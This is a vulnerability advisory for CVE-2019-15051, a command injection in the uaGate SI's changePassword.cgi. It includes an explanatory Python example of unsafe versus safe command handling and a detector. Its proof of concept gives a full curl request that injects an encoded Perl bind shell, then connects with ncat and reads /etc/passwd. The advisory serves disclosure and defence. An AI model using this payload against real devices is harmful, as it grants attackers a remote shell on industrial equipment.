CVE-2019-15051 - uaGate yet another authenticated remote code execution

Abstract:

A CGI script of the uaGate SI handles its parameters in an unsafe fashion. Maliciously crafted URL parameters can transfer an arbitrary command payload that is executed with the rights of the web server. Whatever the command writes to stdout is returned by the web server in the response to the malicious web request.

Attack Vector

An authenticated attacker can execute arbitrary commands by issuing a web request.
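The bug class described above is an OS command injection: a form value reaches a shell as part of a command string, so a value containing "&&" ends the intended command and starts another one. The following Python is an added illustration, not the uaGate firmware or Softing code; the checkpw helper path, the parameter validation rules and the sample request body are assumptions. It shows the vulnerable construction next to the hardened one (an argv list handed to the kernel without a shell, plus input validation) and a small detection helper that decodes a form body and flags parameters carrying shell metacharacters, which is the pattern a web-server access log or WAF rule would look for.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs

# Characters that let a value escape a shell command when it is interpolated
# into a command string.
SHELL_METACHARS = re.compile(r"[;&|`$(){}<>\n\\'\"]")


def build_command_unsafe(user: str, old_password: str) -> str:
    """Vulnerable pattern: form values concatenated into one shell string.
    Returned for inspection only; it is never executed in this example."""
    # /usr/local/bin/checkpw is a hypothetical password-check helper.
    return f"/usr/local/bin/checkpw {user} {old_password}"


def build_command_safe(user: str, old_password: str) -> list[str]:
    """Hardened pattern: validate the inputs, then pass them as separate argv
    entries (e.g. subprocess.run(argv) without shell=True), so metacharacters
    in the value stay literal and never reach a shell."""
    # Assumed validation rules for this example.
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", user):
        raise ValueError("invalid user name")
    if not old_password or len(old_password) > 128:
        raise ValueError("invalid password length")
    return ["/usr/local/bin/checkpw", user, old_password]


def suspicious_params(body: str) -> list[str]:
    """Detection helper: decode an application/x-www-form-urlencoded body and
    return the names of parameters whose value contains shell metacharacters.
    parse_qs turns '+' into a space and decodes %XX escapes, so '%26%26'
    becomes '&&' before the check runs."""
    decoded = parse_qs(body, keep_blank_values=True)
    return sorted(
        name for name, values in decoded.items()
        if any(SHELL_METACHARS.search(v) for v in values)
    )


# Constructed request body in the shape of the advisory's PoC, with a benign
# command ('id') in place of the original payload.
SAMPLE_BODY = (
    "newPassword=secret2&confirmPassword=secret2"
    "&user=mfadmin&oldPassword=secret1+%26%26+id"
)

if __name__ == "__main__":
    params = {k: v[0] for k, v in parse_qs(SAMPLE_BODY).items()}
    print("unsafe :", build_command_unsafe(params["user"], params["oldPassword"]))
    print("safe   :", build_command_safe(params["user"], params["oldPassword"]))
    print("flagged:", suspicious_params(SAMPLE_BODY))
```

The unsafe string shows how the decoded value "secret1 && id" changes the command a shell would run; the safe argv keeps the whole value as a single argument, so the same input is just a wrong password. The detector is deliberately broad (any metacharacter in any parameter), which is the right trade-off for an alert on a device-management interface where passwords are the only field expected to contain such characters at all.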

Proof of Concept Details

curl http://uagate/cgi-bin/changePassword.cgi -d "newPassword=*******&confirmPassword=*******&user=mfadmin&oldPassword=*******+%26%26+perl+-e+%27use+Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C+INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose+C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash+-i%22%29%3B%7D%3B%27" --user mfadmin:****** & (sleep 1; ncat uagate 4223)
cat /etc/passwd

Attack Scenario

This exploit can be used in an exploit chain together with a privilege escalation vulnerability to gain complete control over the target device.

Timeline

  • day 0 - re-test of uaGate SI Device - 07.08.2019
  • day 7 - CVE ID issued by MITRE - 14.08.2019
  • day 47 - issue report to manufacturer - 23.09.2019
  • day 61 - manufacturer acknowledged security issues - 07.10.2019
  • day 63 - fix found in Firmware 1.72.00.1996 - 09.10.2019
  • day 64 - released - 10.10.2019

Credits

rfr@mioso.com

  • uaGate SI Product Page
  • Softing AG